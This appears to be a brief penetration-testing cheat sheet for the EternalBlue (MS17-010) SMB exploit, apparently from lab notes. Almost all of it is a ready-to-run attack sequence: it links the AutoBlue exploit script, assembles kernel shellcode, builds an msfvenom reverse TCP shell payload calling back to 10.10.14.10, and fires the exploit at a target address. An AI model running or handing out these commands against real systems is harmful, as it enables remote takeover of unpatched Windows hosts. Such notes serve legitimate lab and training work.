EternalBlue - MS17-010

Download Python script here: https://github.com/3ndG4me/AutoBlue-MS17-010/tree/master

// Assemble shellcode
$ nasm -f bin eternalblue_kshellcode_x64.asm -o sc_x64_kernel.bin

// Generate payload
$ msfvenom -p windows/x64/shell_reverse_tcp LPORT=4488 LHOST=10.10.14.10 –platform windows -a x64 –format raw -o sc_x64_payload.bin

// Concatenate shellcode & payload
$ cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin

// Exploit
$ python eternalblue_exploit7.py 10.10.10.40 sc_x64.bin

Last updated